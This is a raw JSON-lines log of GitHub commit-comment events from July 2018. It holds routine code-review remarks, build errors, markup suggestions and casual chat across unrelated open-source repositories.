{"id":"8040447094","type":"CommitCommentEvent","actor":{"login":"SaintHellcom"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29894344,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-30T21:39:59Z","updated_at":"2018-07-30T21:39:59Z","author_association":"NONE","body":"@RyanFlemming\r\nCS1061: 'DateTime' does not contain a definition for 'HasValue' and no extension method 'HasValue' accepting a first argument of type 'DateTime' could be found (are you missing a using directive or an assembly reference?)\r\n\r\n\r\n"}},"created_at":"2018-07-30T21:39:59Z"}
{"id":"8040447328","type":"CommitCommentEvent","actor":{"login":"shpendking"},"repo":{"name":"danielmiessler/SecLists"},"payload":{"comment":{"id":29894346,"position":3,"line":3,"path":"Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt","commit_id":"9c67af9639d6ee849bc02fec163d6f336097a174","created_at":"2018-07-30T21:40:02Z","updated_at":"2018-07-30T21:40:02Z","author_association":"NONE","body":"_cc.sh_11"}},"created_at":"2018-07-30T21:40:02Z"}
{"id":"8040448473","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894348,"position":38,"line":38,"path":"Main/src/TaskManager/TaskManagerImpl.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:40:18Z","updated_at":"2018-07-30T21:40:18Z","author_association":"NONE","body":"1. Для проверки существования элементов в списке есть метод .isEmpty()\r\n2. Лучше возвращать пустую коллекцию, чем null. "}},"created_at":"2018-07-30T21:40:18Z"}
{"id":"8040449435","type":"CommitCommentEvent","actor":{"login":"coinmandeer"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894350,"position":22,"line":22,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:40:31Z","updated_at":"2018-07-30T21:40:31Z","author_association":"MEMBER","body":"ten first distribution je trochu zapeklitej, tak premejslim, ze bychom meli vytvorit priklady pro - premined a dalsi variace .. "}},"created_at":"2018-07-30T21:40:31Z"}
{"id":"8040452911","type":"CommitCommentEvent","actor":{"login":"daviddenton"},"repo":{"name":"http4k/http4k"},"payload":{"comment":{"id":29894359,"position":null,"line":null,"path":null,"commit_id":"5bd211044c59b540c441536a8ba610ebc2e65889","created_at":"2018-07-30T21:41:17Z","updated_at":"2018-07-30T21:41:17Z","author_association":"COLLABORATOR","body":"Thanks! The secondary constructor isn't required btw - the default will have the same effect."}},"created_at":"2018-07-30T21:41:17Z"}
{"id":"8040453932","type":"CommitCommentEvent","actor":{"login":"coinmandeer"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894362,"position":41,"line":41,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:41:31Z","updated_at":"2018-07-30T21:41:31Z","author_association":"MEMBER","body":"verejnej blockchain? kdyz mame private tag, tak public dava taky smysl - nebo automaticky pocitame s tim, ze je vsecno public? (kde to specifikujeme)"}},"created_at":"2018-07-30T21:41:31Z"}
{"id":"8040456406","type":"CommitCommentEvent","actor":{"login":"dmatej"},"repo":{"name":"javaee-samples/javaee8-samples"},"payload":{"comment":{"id":29894365,"position":null,"line":null,"path":null,"commit_id":"2bd3c87600cd28126d2b24805757d33ea62ddd59","created_at":"2018-07-30T21:42:03Z","updated_at":"2018-07-30T21:42:03Z","author_association":"CONTRIBUTOR","body":"Status of the whole repo after this commit:\r\npayara-embedded OK\r\npayara-remote OK\r\npayara-micro-managed FAIL (selects incompatible JDK)\r\npayara-ci-managed FAIL (NPE, probably selects incompatible JDK)\r\nglassfish-embedded FAIL (req timeout)\r\ntomcat-ci-managed FAIL (missing jersey-client, with that same as glassfish-embedded)\r\n"}},"created_at":"2018-07-30T21:42:03Z"}
{"id":"8040456889","type":"CommitCommentEvent","actor":{"login":"eliemichel"},"repo":{"name":"eliemichel/CodenameGogh"},"payload":{"comment":{"id":29894368,"position":5,"line":12,"path":"src/Gogh/main.cpp","commit_id":"f046feafac6d8db4dbb794a6a1fe36d970661181","created_at":"2018-07-30T21:42:10Z","updated_at":"2018-07-30T21:42:10Z","author_association":"OWNER","body":"(should not be in this commit)"}},"created_at":"2018-07-30T21:42:10Z"}
{"id":"8040459675","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894373,"position":22,"line":22,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:42:47Z","updated_at":"2018-07-30T21:42:47Z","author_association":"MEMBER","body":"Jojo, dobrej napad"}},"created_at":"2018-07-30T21:42:47Z"}
{"id":"8040460194","type":"CommitCommentEvent","actor":{"login":"Bubu"},"repo":{"name":"Telegram-FOSS-Team/Telegram-FOSS"},"payload":{"comment":{"id":29894374,"position":157,"line":385,"path":"TMessagesProj/src/main/java/org/telegram/ui/LocationActivity.java","commit_id":"43bcb441640ecf1d8155ddc7bd6ba3ef52d0d403","created_at":"2018-07-30T21:42:54Z","updated_at":"2018-07-30T21:42:54Z","author_association":"COLLABORATOR","body":"We can use https here now."}},"created_at":"2018-07-30T21:42:54Z"}
{"id":"8040464675","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894383,"position":5,"line":5,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:43:50Z","updated_at":"2018-07-30T21:43:50Z","author_association":"MEMBER","body":"Navic, officialni stranka cardana bude spis `https://www.cardano.org/`"}},"created_at":"2018-07-30T21:43:50Z"}
{"id":"8040467423","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894387,"position":7,"line":7,"path":"Main/src/TaskManager/TaskManager.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:44:30Z","updated_at":"2018-07-30T21:44:30Z","author_association":"NONE","body":"1. List - шаблонизируемый тип. Поэтому, лучше указывать какой конкретно тип объектов он содержит.\r\n2. Лучше именовать методы в терминах предметной области. Если текущий тип - TaskManager, то метод, возвращающий все задачи логичнее назвать getTaskList() (getTasks(), taskList(), tasks())"}},"created_at":"2018-07-30T21:44:30Z"}
{"id":"8040468165","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29894389,"position":null,"line":null,"path":null,"commit_id":"97dab0d106b2eca7ae687ff4d47a967561b631c3","created_at":"2018-07-30T21:44:40Z","updated_at":"2018-07-30T21:44:40Z","author_association":"CONTRIBUTOR","body":"f the character sprites are below and to the right of the boxes, that is known to me"}},"created_at":"2018-07-30T21:44:40Z"}
{"id":"8040470560","type":"CommitCommentEvent","actor":{"login":"vrnsky"},"repo":{"name":"zh-dmit/Lessons"},"payload":{"comment":{"id":29894392,"position":5,"line":16,"path":"lesonss/src/com/XO/Bird.java","commit_id":"001da9f7ad79c9e9e5f5835424bbb2d4522cdb1c","created_at":"2018-07-30T21:45:13Z","updated_at":"2018-07-30T21:45:13Z","author_association":"NONE","body":"может ли скорость птицы быть отрицательной?\r\nкорректен ли вызов метода ```bird.fly(-50);```?"}},"created_at":"2018-07-30T21:45:13Z"}
{"id":"8040471386","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894396,"position":39,"line":39,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:45:23Z","updated_at":"2018-07-30T21:45:23Z","author_association":"MEMBER","body":"Prosim odkazovat primo na cilovej dokument nebo PDF"}},"created_at":"2018-07-30T21:45:23Z"}
{"id":"8040471496","type":"CommitCommentEvent","actor":{"login":"vrnsky"},"repo":{"name":"zh-dmit/Lessons"},"payload":{"comment":{"id":29894397,"position":7,"line":18,"path":"lesonss/src/com/XO/Bird.java","commit_id":"001da9f7ad79c9e9e5f5835424bbb2d4522cdb1c","created_at":"2018-07-30T21:45:25Z","updated_at":"2018-07-30T21:45:25Z","author_association":"NONE","body":"То же самое"}},"created_at":"2018-07-30T21:45:25Z"}
{"id":"8040474072","type":"CommitCommentEvent","actor":{"login":"vrnsky"},"repo":{"name":"zh-dmit/Lessons"},"payload":{"comment":{"id":29894403,"position":10,"line":10,"path":"lesonss/src/lesons2/Figure.java","commit_id":"001da9f7ad79c9e9e5f5835424bbb2d4522cdb1c","created_at":"2018-07-30T21:45:59Z","updated_at":"2018-07-30T21:45:59Z","author_association":"NONE","body":"могут ли радианы быть отрицательными?"}},"created_at":"2018-07-30T21:45:59Z"}
{"id":"8040474214","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894404,"position":9,"line":9,"path":"Main/src/TaskManager/TaskManager.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:46:01Z","updated_at":"2018-07-30T21:46:01Z","author_association":"NONE","body":"В данном случае имя createTask подходит лучше, потому что будет создан новый объект, а не добавлен уже существующий."}},"created_at":"2018-07-30T21:46:01Z"}
{"id":"8040476103","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894412,"position":10,"line":10,"path":"Main/src/TaskManager/TaskManager.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:46:26Z","updated_at":"2018-07-30T21:46:26Z","author_association":"NONE","body":"Слишком общее называние. Луче updateName(...)"}},"created_at":"2018-07-30T21:46:26Z"}
{"id":"8040476897","type":"CommitCommentEvent","actor":{"login":"zorrikon"},"repo":{"name":"ether/etherpad-lite"},"payload":{"comment":{"id":29894417,"position":null,"line":null,"path":null,"commit_id":"a3ae374a67f898905e4ce12f5f92a02474f6b73a","created_at":"2018-07-30T21:46:36Z","updated_at":"2018-07-30T21:46:36Z","author_association":"NONE","body":"Thanks @muxator that worked :)."}},"created_at":"2018-07-30T21:46:36Z"}
{"id":"8040477895","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894420,"position":41,"line":41,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:46:50Z","updated_at":"2018-07-30T21:46:50Z","author_association":"MEMBER","body":"Public moc smysl nedava, blockchainy jsou z podstaty otevreny, pokud je privat tak je to specifikum"}},"created_at":"2018-07-30T21:46:50Z"}
{"id":"8040479791","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894426,"position":11,"line":11,"path":"Main/src/TaskManager/TaskManager.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:47:16Z","updated_at":"2018-07-30T21:47:16Z","author_association":"NONE","body":"Желательно, чтобы методы, отвечающие за похожие действия имели похожие имена. "}},"created_at":"2018-07-30T21:47:16Z"}
{"id":"8040479796","type":"CommitCommentEvent","actor":{"login":"hardion"},"repo":{"name":"EuroPython/ep-config"},"payload":{"comment":{"id":29894427,"position":15,"line":34,"path":"roles/common/tasks/main.yml","commit_id":"4812564d4dad1c4fa726978ca04ba92b9c0ae441","created_at":"2018-07-30T21:47:16Z","updated_at":"2018-07-30T21:47:16Z","author_association":"NONE","body":"The pip install through apt should remove the need to the pip installation in the python role.\r\n\r\n```yaml\r\n- name: Download get-pip.py\r\n  get_url:\r\n    url: https://bootstrap.pypa.io/get-pip.py\r\n    dest: \"{{ tmp_install_dir }}/get-pip.py\"\r\n    mode: 0550\r\n\r\n- name: Install pip\r\n  command: python {{ tmp_install_dir }}/get-pip.py\r\n\r\n- name: Delete get-pip.py\r\n  file:\r\n    path: \"{{ tmp_install_dir }}/get-pip.py\"\r\n    state: absent\r\n\r\n- name: Update pip and setuptools\r\n  pip:\r\n    name: '{{ item }}'\r\n    state: forcereinstall\r\n  with_items:\r\n    - pip\r\n    - setuptools\r\n```"}},"created_at":"2018-07-30T21:47:16Z"}
{"id":"8040479892","type":"CommitCommentEvent","actor":{"login":"mbavaro"},"repo":{"name":"swift-nav/RTKLIB"},"payload":{"comment":{"id":29894428,"position":null,"line":null,"path":null,"commit_id":"5d78ecae7659d4083edb7ef8315bed5c4f8fa478","created_at":"2018-07-30T21:47:17Z","updated_at":"2018-07-30T21:47:17Z","author_association":"NONE","body":"Pumped up Galileo max PRN to 36"}},"created_at":"2018-07-30T21:47:17Z"}
{"id":"8040480409","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894429,"position":43,"line":43,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:47:24Z","updated_at":"2018-07-30T21:47:24Z","author_association":"MEMBER","body":"Na tohle se musi vytvorit novy webid `facebook/group`"}},"created_at":"2018-07-30T21:47:24Z"}
{"id":"8040481245","type":"CommitCommentEvent","actor":{"login":"Vendriix"},"repo":{"name":"Vendriix/Stuff"},"payload":{"comment":{"id":29894430,"position":null,"line":null,"path":null,"commit_id":"3fd4dc160a06dfe7c6f798f320de0f7a6e400100","created_at":"2018-07-30T21:47:36Z","updated_at":"2018-07-30T21:47:36Z","author_association":"OWNER","body":"Hey c'est Vendrix je me demandais -pour les français- si vous voulez une version française du Pokédex."}},"created_at":"2018-07-30T21:47:36Z"}
{"id":"8040481767","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29894432,"position":null,"line":null,"path":null,"commit_id":"97dab0d106b2eca7ae687ff4d47a967561b631c3","created_at":"2018-07-30T21:47:44Z","updated_at":"2018-07-30T21:47:44Z","author_association":"CONTRIBUTOR","body":"Not talking about that. See the pictures I sent in Skype"}},"created_at":"2018-07-30T21:47:44Z"}
{"id":"8040484697","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894445,"position":4,"line":4,"path":"Main/src/TaskManager/Task.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:48:23Z","updated_at":"2018-07-30T21:48:23Z","author_association":"NONE","body":"Почитай про стандарт именования в Java. Его лучше придерживаться."}},"created_at":"2018-07-30T21:48:23Z"}
{"id":"8040486068","type":"CommitCommentEvent","actor":{"login":"stonebig"},"repo":{"name":"altair-viz/altair"},"payload":{"comment":{"id":29894448,"position":null,"line":null,"path":null,"commit_id":"4d7078b78fe9201c8bf2ab0cb403ac73a32115e0","created_at":"2018-07-30T21:48:43Z","updated_at":"2018-07-30T21:48:43Z","author_association":"NONE","body":"It would need a non-financial example to appeal the scientific audience. I don't have one in mind."}},"created_at":"2018-07-30T21:48:43Z"}
{"id":"8040487083","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29894449,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-30T21:48:57Z","updated_at":"2018-07-30T21:48:57Z","author_association":"NONE","body":"Try a rebuild. Sometimes VS is flaky."}},"created_at":"2018-07-30T21:48:57Z"}
{"id":"8040490206","type":"CommitCommentEvent","actor":{"login":"hdanaci"},"repo":{"name":"ZeroBank01/ZeroBank-Online7"},"payload":{"comment":{"id":29894459,"position":null,"line":null,"path":null,"commit_id":"4e7c77fbb70c39d5f581defe8be36d7a8fecf7c7","created_at":"2018-07-30T21:49:40Z","updated_at":"2018-07-30T21:49:40Z","author_association":"CONTRIBUTOR","body":"add"}},"created_at":"2018-07-30T21:49:40Z"}
{"id":"8040491090","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29894461,"position":65,"line":60,"path":"dev-util/mdds/mdds-1.3.1.recipe","commit_id":"68e88ad2b23801fcec1e8105b9118a2d04e290b1","created_at":"2018-07-30T21:49:52Z","updated_at":"2018-07-30T21:49:52Z","author_association":"MEMBER","body":"For 2 reasons:\r\n* `make install` was installing the `mdds-*.pc` file in `$dataDir/pkgconfig/`.\r\n* Installing anything in `$libDir` does not seem to be appropriate with `any`-arch packages."}},"created_at":"2018-07-30T21:49:52Z"}
{"id":"8040492954","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29894468,"position":null,"line":null,"path":null,"commit_id":"97dab0d106b2eca7ae687ff4d47a967561b631c3","created_at":"2018-07-30T21:50:16Z","updated_at":"2018-07-30T21:50:16Z","author_association":"CONTRIBUTOR","body":"i see that, will look into it\r\n"}},"created_at":"2018-07-30T21:50:16Z"}
{"id":"8040494154","type":"CommitCommentEvent","actor":{"login":"fire21407"},"repo":{"name":"Programming-Discord/discord-bot"},"payload":{"comment":{"id":29894472,"position":null,"line":null,"path":null,"commit_id":"837f7d41108e5d22b6da9be97a8ca8cbdf30de27","created_at":"2018-07-30T21:50:31Z","updated_at":"2018-07-30T21:50:31Z","author_association":"NONE","body":"lol"}},"created_at":"2018-07-30T21:50:31Z"}
{"id":"8040499687","type":"CommitCommentEvent","actor":{"login":"hdanaci"},"repo":{"name":"ZeroBank01/ZeroBank-Online7"},"payload":{"comment":{"id":29894483,"position":null,"line":null,"path":null,"commit_id":"7529a816e300a7a4ee2d20f783a399e1cce84ad6","created_at":"2018-07-30T21:51:46Z","updated_at":"2018-07-30T21:51:46Z","author_association":"CONTRIBUTOR","body":"add"}},"created_at":"2018-07-30T21:51:46Z"}
{"id":"8040500668","type":"CommitCommentEvent","actor":{"login":"vak2ve"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29894486,"position":null,"line":null,"path":null,"commit_id":"2e0bcd35cd93660a78a821d32bc82428e8208db4","created_at":"2018-07-30T21:51:58Z","updated_at":"2018-07-30T21:51:58Z","author_association":"CONTRIBUTOR","body":"@WaxCylinderRevival I much prefer the second version too (and will definitely go back and standardize the 1868s), I just saw the changes made to this commit of 1873p1v1 and wasn't sure if I'd been doing it wrong. Wouldn't\r\n\r\n`<frus:attachment>\r\n                        <head>[From the Pacific Commercial Advertiser, Saturday, May 4,\r\n                            1872.]</head>\r\n                        <dateline>[<date when=\"1872-05-04\"\r\n                                ana=\"#date_imprecise-inferred-from-document-head\"\r\n                                calendar=\"gregorian\">May 4, 1872</date>]</dateline>\r\n                        <p rend=\"center\">\r\n                            <hi rend=\"smallcaps\">opening of the legislative assembly.</hi>\r\n                        </p>`\r\n\r\nbe\r\n\r\n`<frus:attachment>\r\n                        <opener><dateline rendition=\"#center\">[From the Pacific Commercial Advertiser, Saturday, <date when=\"1872-05-04\" calendar=\"gregorian\">May 4, 1872</date>.]</dateline></opener>\r\n                           <head><hi rend=\"smallcaps\">opening of the legislative assembly.</hi></head>\r\n                        `\r\n\r\n"}},"created_at":"2018-07-30T21:51:58Z"}
{"id":"8040500824","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894487,"position":null,"line":null,"path":null,"commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:52:00Z","updated_at":"2018-07-30T21:52:00Z","author_association":"NONE","body":"Добавь в репозиторий файлы сборочной системы (.gradle, /gradle, etc). Для проверки, попробуй склонировать проект в новое место. Данный проект должен без проблем собраться сразу после клонирования"}},"created_at":"2018-07-30T21:52:00Z"}
{"id":"8040504330","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29894495,"position":null,"line":null,"path":null,"commit_id":"ff72c50c8b38a9f78faed2bbcf9e67253375e5a5","created_at":"2018-07-30T21:52:47Z","updated_at":"2018-07-30T21:52:47Z","author_association":"NONE","body":"[tests/testthat/test-graph.R:335:1:](https://github.com/ropensci/drake/blob/ff72c50c8b38a9f78faed2bbcf9e67253375e5a5/tests/testthat/test-graph.R#L335) *style:* **lines should not be more than 80 characters.**\n```r\n​    sort(c(file_store(paste0(\"out\", 3:4, \".txt\")), \"status: up to date\", \"target2\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-graph.R:422:1:](https://github.com/ropensci/drake/blob/ff72c50c8b38a9f78faed2bbcf9e67253375e5a5/tests/testthat/test-graph.R#L422) *style:* **lines should not be more than 80 characters.**\n```r\n​    sort(c(file_store(paste0(\"out\", 3:4, \".txt\")), \"status: up to date\", \"target2\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-30T21:52:47Z"}
{"id":"8040511001","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29894510,"position":null,"line":null,"path":null,"commit_id":"2e0bcd35cd93660a78a821d32bc82428e8208db4","created_at":"2018-07-30T21:54:18Z","updated_at":"2018-07-30T21:54:18Z","author_association":"MEMBER","body":"Yes, perfect!  I agree.\r\n\r\nI'm updating three already-published attachments in the master repo in the same way, including identifying the new `head."}},"created_at":"2018-07-30T21:54:18Z"}
{"id":"8040511904","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29894511,"position":null,"line":null,"path":null,"commit_id":"6c1e871dfe1983ea5b9d974f5e3e3d7ea9db1f96","created_at":"2018-07-30T21:54:31Z","updated_at":"2018-07-30T21:54:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Routes for Employee](https://trello.com/c/SwVOLGKr/18-routes-for-employee)"}},"created_at":"2018-07-30T21:54:31Z"}
{"id":"8040519045","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29894527,"position":65,"line":60,"path":"dev-util/mdds/mdds-1.3.1.recipe","commit_id":"68e88ad2b23801fcec1e8105b9118a2d04e290b1","created_at":"2018-07-30T21:56:10Z","updated_at":"2018-07-30T21:56:10Z","author_association":"MEMBER","body":"BTW, in case you have any package that needs an old `mdds_x86` then it should probably be rebuilt.\r\n"}},"created_at":"2018-07-30T21:56:10Z"}
{"id":"8040519507","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29894529,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T21:56:16Z","updated_at":"2018-07-30T21:56:16Z","author_association":"NONE","body":"I have starting also a big test with 32 threads at LTC with prio 1 to catch to big machines if their come in.\r\nhttp://tests.stockfishchess.org/tests/view/5b5f88c30ebc5902bdb92b98\r\n@noobpwnftw \r\nIf this test is approved it would be nice if you can plug in your 384-threads machine to fishtest to run the test."}},"created_at":"2018-07-30T21:56:16Z"}
{"id":"8040523605","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"otrv4/otrng-prekey-server"},"payload":{"comment":{"id":29894537,"position":null,"line":null,"path":null,"commit_id":"e89231bb6ddadad27c3b90be2086b5ba98ebd707","created_at":"2018-07-30T21:57:12Z","updated_at":"2018-07-30T21:57:12Z","author_association":"MEMBER","body":"@claucece,\r\n\r\nThis is an attempt to reproduce the same test, based only on serialized data, in C:\r\nhttps://github.com/otrv4/libotr-ng/commit/e0c2845ac78214ab1682e7de2c0e5826517b3fff\r\n\r\nThe keys seems to be OK, since I can create and verify a new ring signature using the same keys.\r\n\r\nIt may be stupidity on my side, so no rush. \r\n\r\ncc/ @giovaneliberato "}},"created_at":"2018-07-30T21:57:12Z"}
{"id":"8040524861","type":"CommitCommentEvent","actor":{"login":"fatcerberus"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29894538,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T21:57:31Z","updated_at":"2018-07-30T21:57:31Z","author_association":"CONTRIBUTOR","body":"I don’t understand why one of these produces a warning but the other doesn’t; they are 100% equivalent in every way."}},"created_at":"2018-07-30T21:57:31Z"}
{"id":"8040525881","type":"CommitCommentEvent","actor":{"login":"rdingwell"},"repo":{"name":"health-data-manager/hdm-ui"},"payload":{"comment":{"id":29894540,"position":4,"line":4,"path":"src/utils/getDisplayString.js","commit_id":"f754b4aa9e834cf7dc568345d757986aae0bc9fc","created_at":"2018-07-30T21:57:45Z","updated_at":"2018-07-30T21:57:45Z","author_association":"CONTRIBUTOR","body":"Can you protect this call to coding so it wont throw an error if coding isn't defined.   Either surround in try catch or if statements. "}},"created_at":"2018-07-30T21:57:45Z"}
{"id":"8040526358","type":"CommitCommentEvent","actor":{"login":"s-zanella"},"repo":{"name":"project-everest/hacl-star"},"payload":{"comment":{"id":29894542,"position":12,"line":93,"path":"lib/fst/Lib.Sequence.fst","commit_id":"b2b76126cb5c43c40a1d93229a726b2e16e5a34d","created_at":"2018-07-30T21:57:52Z","updated_at":"2018-07-30T21:57:52Z","author_association":"CONTRIBUTOR","body":"This should have been `(0 <= k /\\ k < start) \\/ (start + n <= k /\\ k < len)`. Yuck"}},"created_at":"2018-07-30T21:57:52Z"}
{"id":"8040528207","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29894550,"position":null,"line":null,"path":null,"commit_id":"2e0bcd35cd93660a78a821d32bc82428e8208db4","created_at":"2018-07-30T21:58:18Z","updated_at":"2018-07-30T21:58:18Z","author_association":"MEMBER","body":"@vak2ve, FYI, there is an @ana tag to indicate we're inserting the [Untitled] post-print volume, if you find you need to use it.  Example:\r\n\r\n```xml\r\n<head ana=\"#head_untitled-missing-head-in-printed-volume\">[Untitled]</head>\r\n```"}},"created_at":"2018-07-30T21:58:18Z"}
{"id":"8040530155","type":"CommitCommentEvent","actor":{"login":"Panzer1119"},"repo":{"name":"OmniKryptec/OmniKryptec-Engine"},"payload":{"comment":{"id":29894556,"position":null,"line":null,"path":null,"commit_id":"6230c29e4f6aa44f61e80e877473653adf9aae4e","created_at":"2018-07-30T21:58:46Z","updated_at":"2018-07-30T21:58:46Z","author_association":"COLLABORATOR","body":"lol this just slows the code down"}},"created_at":"2018-07-30T21:58:46Z"}
{"id":"8040532519","type":"CommitCommentEvent","actor":{"login":"mst209"},"repo":{"name":"perksy/raas-v2-sdk-ruby"},"payload":{"comment":{"id":29894560,"position":null,"line":null,"path":null,"commit_id":"1b23c19cbeb56ec026b355de99976cf0ad987d8d","created_at":"2018-07-30T21:59:20Z","updated_at":"2018-07-30T21:59:20Z","author_association":"NONE","body":"Updgraded Faraday Dependency"}},"created_at":"2018-07-30T21:59:20Z"}
{"id":"8040534102","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894562,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T21:59:40Z","updated_at":"2018-07-30T21:59:40Z","author_association":"CONTRIBUTOR","body":":tada::clap::tada::clap::tada:\r\n:tada::clap::tada::clap::tada:\r\n:tada::clap::tada::clap::tada:\r\n:clap::tada::clap::tada::clap:"}},"created_at":"2018-07-30T21:59:40Z"}
{"id":"8040534938","type":"CommitCommentEvent","actor":{"login":"Panzer1119"},"repo":{"name":"OmniKryptec/OmniKryptec-Engine"},"payload":{"comment":{"id":29894564,"position":4,"line":24,"path":"src/omnikryptec/physics/Dyn4JPhysicsWorld.java","commit_id":"0cb5bdc0b6a949f03891a89cc88d4d8165c0a87d","created_at":"2018-07-30T21:59:50Z","updated_at":"2018-07-30T21:59:50Z","author_association":"COLLABORATOR","body":"Why is there a new line?"}},"created_at":"2018-07-30T21:59:50Z"}
{"id":"8040534998","type":"CommitCommentEvent","actor":{"login":"Vrontis"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894565,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T21:59:51Z","updated_at":"2018-07-30T21:59:51Z","author_association":"NONE","body":"this is so sad alexa pls pat kode."}},"created_at":"2018-07-30T21:59:51Z"}
{"id":"8040535562","type":"CommitCommentEvent","actor":{"login":"Panzer1119"},"repo":{"name":"OmniKryptec/OmniKryptec-Engine"},"payload":{"comment":{"id":29894566,"position":13,"line":42,"path":"src/omnikryptec/physics/AdvancedBody.java","commit_id":"0cb5bdc0b6a949f03891a89cc88d4d8165c0a87d","created_at":"2018-07-30T21:59:58Z","updated_at":"2018-07-30T21:59:58Z","author_association":"COLLABORATOR","body":"Why is there a new line?"}},"created_at":"2018-07-30T21:59:58Z"}
